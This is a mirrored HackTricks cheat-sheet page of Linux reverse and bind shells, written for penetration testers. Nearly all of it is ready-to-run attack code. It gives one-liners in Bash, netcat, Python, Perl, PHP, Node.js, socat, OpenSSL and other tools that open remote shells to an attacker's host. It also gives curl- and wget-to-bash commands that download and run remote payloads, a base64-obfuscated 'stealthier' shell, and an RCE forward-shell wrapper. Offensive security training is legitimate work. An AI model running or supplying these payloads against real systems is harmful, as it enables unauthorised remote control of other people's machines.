mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
408 lines
15 KiB
Markdown
408 lines
15 KiB
Markdown
|
# Shells - Linux
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
|
||
|
|
||
|
## Full TTY
|
||
|
|
||
|
**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
|
||
|
|
||
|
## Bash | sh
|
||
|
|
||
|
```bash
|
||
|
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
|
||
|
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
|
||
|
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
|
||
|
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
|
||
|
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
|
||
|
|
||
|
#Short and bypass (credits to Dikline)
|
||
|
(sh)0>/dev/tcp/10.10.10.10/9091
|
||
|
#after getting the previous shell to get the output to execute
|
||
|
exec >&0
|
||
|
```
|
||
|
|
||
|
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
|
||
|
|
||
|
### Symbol safe shell
|
||
|
|
||
|
```bash
|
||
|
#If you need a more stable connection do:
|
||
|
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
|
||
|
|
||
|
#Stealthier method
|
||
|
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
|
||
|
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
|
||
|
```
|
||
|
|
||
|
#### Shell explanation
|
||
|
|
||
|
1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
|
||
|
2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
|
||
|
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special file that **represents a TCP connection to the specified IP address and port**.
|
||
|
* By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine.
|
||
|
4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**.
|
||
|
|
||
|
### Create in file and execute
|
||
|
|
||
|
```bash
|
||
|
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
|
||
|
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
|
||
|
```
|
||
|
|
||
|
## Forward Shell
|
||
|
|
||
|
When dealing with a **Remote Code Execution (RCE)** vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network defenses like iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively.
|
||
|
|
||
|
A recommended tool for this purpose is [toboggan](https://github.com/n3rada/toboggan.git), which simplifies interaction with the target environment.
|
||
|
|
||
|
To utilize toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named `nix.py` could be structured as follows:
|
||
|
```python3
|
||
|
import jwt
|
||
|
import httpx
|
||
|
|
||
|
def execute(command: str, timeout: float = None) -> str:
|
||
|
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
|
||
|
token = jwt.encode(
|
||
|
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
|
||
|
)
|
||
|
|
||
|
response = httpx.get(
|
||
|
url="https://vulnerable.io:3200",
|
||
|
headers={"Authorization": f"Bearer {token}"},
|
||
|
timeout=timeout,
|
||
|
# ||BURP||
|
||
|
verify=False,
|
||
|
)
|
||
|
|
||
|
# Check if the request was successful
|
||
|
response.raise_for_status()
|
||
|
|
||
|
return response.text
|
||
|
```
|
||
|
|
||
|
And then, you can run:
|
||
|
```shell
|
||
|
toboggan -m nix.py -i
|
||
|
```
|
||
|
|
||
|
To directly leverage an interractive shell. You can add `-b` for Burpsuite integration and remove the `-i` for a more basic rce wrapper.
|
||
|
|
||
|
|
||
|
Another possibility consist using the `IppSec` forward shell implementation [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
|
||
|
|
||
|
You just need to modify:
|
||
|
|
||
|
* The URL of the vulnerable host
|
||
|
* The prefix and suffix of your payload (if any)
|
||
|
* The way the payload is sent (headers? data? extra info?)
|
||
|
|
||
|
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
|
||
|
|
||
|
## Netcat
|
||
|
|
||
|
```bash
|
||
|
nc -e /bin/sh <ATTACKER-IP> <PORT>
|
||
|
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
|
||
|
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
|
||
|
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||
|
```
|
||
|
|
||
|
## gsocket
|
||
|
|
||
|
Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
|
||
|
|
||
|
```bash
|
||
|
bash -c "$(curl -fsSL gsocket.io/x)"
|
||
|
```
|
||
|
|
||
|
## Telnet
|
||
|
|
||
|
```bash
|
||
|
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
|
||
|
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
|
||
|
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||
|
```
|
||
|
|
||
|
## Whois
|
||
|
|
||
|
**Attacker**
|
||
|
|
||
|
```bash
|
||
|
while true; do nc -l <port>; done
|
||
|
```
|
||
|
|
||
|
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||
|
|
||
|
**Victim**
|
||
|
|
||
|
```bash
|
||
|
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
|
||
|
```
|
||
|
|
||
|
## Python
|
||
|
|
||
|
```bash
|
||
|
#Linux
|
||
|
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||
|
#IPv6
|
||
|
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||
|
```
|
||
|
|
||
|
## Perl
|
||
|
|
||
|
```bash
|
||
|
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||
|
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||
|
```
|
||
|
|
||
|
## Ruby
|
||
|
|
||
|
```bash
|
||
|
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||
|
```
|
||
|
|
||
|
## PHP
|
||
|
|
||
|
```php
|
||
|
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
|
||
|
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
|
||
|
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||
|
|
||
|
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
|
||
|
// See https://security.stackexchange.com/a/198944 for more information
|
||
|
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
|
||
|
|
||
|
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
|
||
|
```
|
||
|
|
||
|
## Java
|
||
|
|
||
|
```bash
|
||
|
r = Runtime.getRuntime()
|
||
|
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||
|
p.waitFor()
|
||
|
```
|
||
|
|
||
|
## Ncat
|
||
|
|
||
|
```bash
|
||
|
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
|
||
|
attacker> ncat -l <port,eg.443> --ssl
|
||
|
```
|
||
|
|
||
|
## Golang
|
||
|
|
||
|
```bash
|
||
|
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
|
||
|
```
|
||
|
|
||
|
## Lua
|
||
|
|
||
|
```bash
|
||
|
#Linux
|
||
|
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||
|
#Windows & Linux
|
||
|
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||
|
```
|
||
|
|
||
|
## NodeJS
|
||
|
|
||
|
```javascript
|
||
|
(function(){
|
||
|
var net = require("net"),
|
||
|
cp = require("child_process"),
|
||
|
sh = cp.spawn("/bin/sh", []);
|
||
|
var client = new net.Socket();
|
||
|
client.connect(8080, "10.17.26.64", function(){
|
||
|
client.pipe(sh.stdin);
|
||
|
sh.stdout.pipe(client);
|
||
|
sh.stderr.pipe(client);
|
||
|
});
|
||
|
return /a/; // Prevents the Node.js application form crashing
|
||
|
})();
|
||
|
|
||
|
|
||
|
or
|
||
|
|
||
|
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||
|
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
|
||
|
|
||
|
or
|
||
|
|
||
|
-var x = global.process.mainModule.require
|
||
|
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||
|
|
||
|
or
|
||
|
|
||
|
// If you get to the constructor of a function you can define and execute another function inside a string
|
||
|
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||
|
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||
|
|
||
|
|
||
|
or
|
||
|
|
||
|
// Abuse this syntax to get a reverse shell
|
||
|
var fs = this.process.binding('fs');
|
||
|
var fs = process.binding('fs');
|
||
|
|
||
|
or
|
||
|
|
||
|
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
|
||
|
```
|
||
|
|
||
|
## OpenSSL
|
||
|
|
||
|
The Attacker (Kali)
|
||
|
|
||
|
```bash
|
||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||
|
```
|
||
|
|
||
|
The Victim
|
||
|
|
||
|
```bash
|
||
|
#Linux
|
||
|
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
|
|
||
|
#Windows
|
||
|
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
|
```
|
||
|
|
||
|
## **Socat**
|
||
|
|
||
|
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
|
||
|
|
||
|
### Bind shell
|
||
|
|
||
|
```bash
|
||
|
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||
|
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||
|
```
|
||
|
|
||
|
### Reverse shell
|
||
|
|
||
|
```bash
|
||
|
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
|
||
|
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||
|
```
|
||
|
|
||
|
## Awk
|
||
|
|
||
|
```bash
|
||
|
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||
|
```
|
||
|
|
||
|
## Finger
|
||
|
|
||
|
**Attacker**
|
||
|
|
||
|
```bash
|
||
|
while true; do nc -l 79; done
|
||
|
```
|
||
|
|
||
|
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||
|
|
||
|
**Victim**
|
||
|
|
||
|
```bash
|
||
|
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
|
||
|
|
||
|
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
|
||
|
```
|
||
|
|
||
|
## Gawk
|
||
|
|
||
|
```bash
|
||
|
#!/usr/bin/gawk -f
|
||
|
|
||
|
BEGIN {
|
||
|
Port = 8080
|
||
|
Prompt = "bkd> "
|
||
|
|
||
|
Service = "/inet/tcp/" Port "/0/0"
|
||
|
while (1) {
|
||
|
do {
|
||
|
printf Prompt |& Service
|
||
|
Service |& getline cmd
|
||
|
if (cmd) {
|
||
|
while ((cmd |& getline) > 0)
|
||
|
print $0 |& Service
|
||
|
close(cmd)
|
||
|
}
|
||
|
} while (cmd != "exit")
|
||
|
close(Service)
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
|
||
|
## Xterm
|
||
|
|
||
|
This will try to connect to your system at port 6001:
|
||
|
|
||
|
```bash
|
||
|
xterm -display 10.0.0.1:1
|
||
|
```
|
||
|
|
||
|
To catch the reverse shell you can use (which will listen in port 6001):
|
||
|
|
||
|
```bash
|
||
|
# Authorize host
|
||
|
xhost +targetip
|
||
|
# Listen
|
||
|
Xnest :1
|
||
|
```
|
||
|
|
||
|
## Groovy
|
||
|
|
||
|
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
|
||
|
|
||
|
```bash
|
||
|
String host="localhost";
|
||
|
int port=8044;
|
||
|
String cmd="cmd.exe";
|
||
|
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||
|
```
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||
|
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
|
||
|
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
|
||
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|